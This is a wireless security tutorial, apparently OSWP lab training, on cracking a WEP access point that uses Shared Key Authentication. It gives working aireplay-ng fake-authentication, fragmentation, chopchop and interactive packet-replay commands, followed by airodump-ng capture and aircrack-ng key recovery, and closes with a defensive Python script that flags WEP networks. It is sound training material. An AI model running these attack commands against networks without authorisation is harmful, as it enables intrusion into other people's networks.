7 – Shared Key Authentication (SKA) Alternative Method

As you saw in the previous lesson, we could not obtain the XOR (keystream) with the easiest method, so instead we have to work a little harder and either forge some packets of our own in order to authenticate to the access point, or do this with another method entirely.

First of all, some snippets from the aireplay-ng man page on the fragmentation and chopchop attacks:

Fragmentation:

Pros
– Can obtain the full packet length of 1500 bytes XOR. This
means you can subsequently pretty well create any size of
packet.

– May work where chopchop does not

– Is extremely fast. It yields the XOR stream extremely quickly
when successful.

Cons
– Setup to execute the attack is more subject to the device
drivers. For example, Atheros does not generate the correct
packets unless the wireless card is set to the mac address you
are spoofing.

– You need to be physically closer to the access point since if
any packets are lost then the attack fails.

Chopchop

Pro
– May work where frag does not work.

Cons
– Cannot be used against every access point.

– The maximum XOR bits is limited to the length of the packet
you chopchop against.

– Much slower than the fragmentation attack.

First, before we begin, we can try a fake authentication with aireplay-ng and see if we have any success:

aireplay-ng --fakeauth 0 -o 1 -e test -a 00:18:E7:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0 --ignore-negative-one

Look in “man aireplay-ng” to see the meaning of the switches used.

[Image: 1 - Try fake auth]

Failure to authenticate looks like the following:

[Image: 2 - Fake auth failure]

Now let’s try a fragmentation attack on the access point, so get your card listening with airodump-ng and let’s get to it!

[Image: 3 - airodump start]

Output:

[Image: 4 - airodump output]

Fragmentation attack:

aireplay-ng --fragment -b 00:18:E7:XX:XX:XX -h F4:09:D8:XX:XX:XX mon0

“aireplay-ng” – start aireplay-ng
“--fragment” – run a fragmentation attack
“-b 00:18:E7:XX:XX:XX” – the access point MAC
“-h F4:09:D8:XX:XX:XX” – your MAC address
“mon0” – the monitor interface

[Image: 5 - aireplay fragmentation attack]

When a packet appears, answer with either “y” or “n” and let it run for a bit. You will know fairly quickly whether it works or not; an example of it failing is below, as you will see a stream of failures and eventually it will ask you to select yes or no for a new packet.

[Image: 6 - fragmentation failure]

Chopchop attack:

aireplay-ng --chopchop -b 00:18:E7:XX:XX:XX -h F4:09:D8:XX:XX:XX mon0

“aireplay-ng” – start aireplay-ng
“--chopchop” – run a chopchop attack
“-b 00:18:E7:XX:XX:XX” – the access point MAC
“-h F4:09:D8:XX:XX:XX” – your MAC address
“mon0” – the monitor interface

[Image: 7 - chopchop failure]

Output on failure:

[Image: 8 - chopchop failure]

This AP is quite tricky and I can see why it is recommended for the OSWP training. Rather than pulling my hair out repeating the same thing again and again and expecting different results, I used an interactive packet replay attack. There are some other options here too, but we will look at those another time, or you could even try them yourself as an extra exercise! The process to crack the key on this tricky SKA access point looks like the following.

Leave airodump-ng running on your channel and writing the output to a file with -w:

airodump-ng -c 6 mon0 -w SKA

[Image: 9 - airodump-ng start]
Next, run aireplay-ng with an interactive packet replay attack:

aireplay-ng -2 -b 00:18:E7:C5:49:DA -d FF:FF:FF:FF:FF:FF -t 1 mon0

“-2” – sets the interactive replay attack
“-b 00:18:E7:C5:49:DA” – selects packets with the MAC of the access point you are testing
“-d FF:FF:FF:FF:FF:FF” – selects packets with a broadcast destination
“-t 1” – selects packets with the “To Distribution System” flag set
“mon0” – your wireless interface

Leave this running for a few minutes; you will see the packet count increasing here, which is a good thing.

[Image: 10 - interactive packet replay]
Then run aircrack-ng against the pcap to crack the key, selecting the BSSID you wish to run it against. Note that in the image below I have obtained 31848 IVs, which will definitely help the cracking process.

Running aircrack-ng is simple with:

aircrack-ng SKA-01.cap

[Image: 11 - Running Aircrack-ng WEP SKA]

Success looks like this:

[Image: 12 - WEP SKA Key Cracked with no authentication]
This ends the WEP SKA tutorial; let’s move on to the more common “Open System Authentication”, as this is the default and most people would not bother changing the default on a router. This is more of a history lesson than anything else, although I still see a lot of WEP around the place, and people seem to think hiding it is OK too!
Lesson learned:
Shared Key Authentication, even though it sounds like an added security feature, adds no security to your access point. It is very easy to obtain the keystream used in the handshake by capturing the challenge frames of the shared key authentication exchange. Data can be intercepted and decrypted more easily with shared key authentication than with open system authentication. Using open authentication means any wireless client can connect to the access point, but you should use neither, as both have clearly been broken for some time now.
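As an added audit example (not part of this tutorial), the following Python flags WEP networks, and WEP with Shared Key Authentication in particular, in the CSV summary that airodump-ng -w writes next to the capture (SKA-01.csv here). The CSV sample inside it is constructed, and the column layout is assumed to match what the aircrack-ng suite writes.

```python
"""Flag WEP networks, and WEP with SKA, in an airodump-ng CSV summary."""
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv
# (assumption: column names as in the aircrack-ng suite; every value is made up).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:E7:00:00:01, 2013-01-01 10:00:00, 2013-01-01 10:05:00,  6, 54, WEP , WEP, SKA, -40, 120, 31848, 0.0.0.0, 4, test,
00:18:E7:00:00:02, 2013-01-01 10:00:00, 2013-01-01 10:05:00,  6, 54, WEP , WEP, OPN, -55,  80,    12, 0.0.0.0, 6, guest1,
00:18:E7:00:00:03, 2013-01-01 10:00:00, 2013-01-01 10:05:00, 11, 54, WPA2, CCMP, PSK, -60, 200,     0, 0.0.0.0, 6, office,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_access_points(text):
    """Return the access-point rows (the first CSV section) as dicts, keys and values stripped."""
    ap_section = text.split("\n\n", 1)[0]  # the station table follows the first blank line
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    return [{(k or "").strip(): (v or "").strip() for k, v in row.items()} for row in reader]


def classify(ap):
    """Describe why an access point is a finding, or return None if it is not WEP."""
    if not ap.get("Privacy", "").startswith("WEP"):
        return None
    if ap.get("Authentication") == "SKA":
        finding = "WEP with Shared Key Authentication: the challenge exchange leaks keystream"
    else:
        finding = "WEP with Open System Authentication: key recoverable from captured IVs"
    try:
        ivs = int(ap.get("# IV") or 0)
    except ValueError:
        ivs = 0
    if ivs >= 20000:  # constructed threshold; the tutorial cracked the key with 31848 IVs
        finding += f" ({ivs} IVs already captured, migrate to WPA2 now)"
    return finding


def find_weak_aps(text):
    """Map BSSID -> finding for every WEP network in an airodump-ng CSV."""
    findings = {}
    for ap in parse_access_points(text):
        finding = classify(ap)
        if finding:
            findings[ap["BSSID"]] = finding
    return findings


if __name__ == "__main__":
    for bssid, finding in find_weak_aps(SAMPLE_CSV).items():
        print(f"{bssid}: {finding}")
```

Point it at the real SKA-01.csv by reading the file into a string and passing it to find_weak_aps.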
 
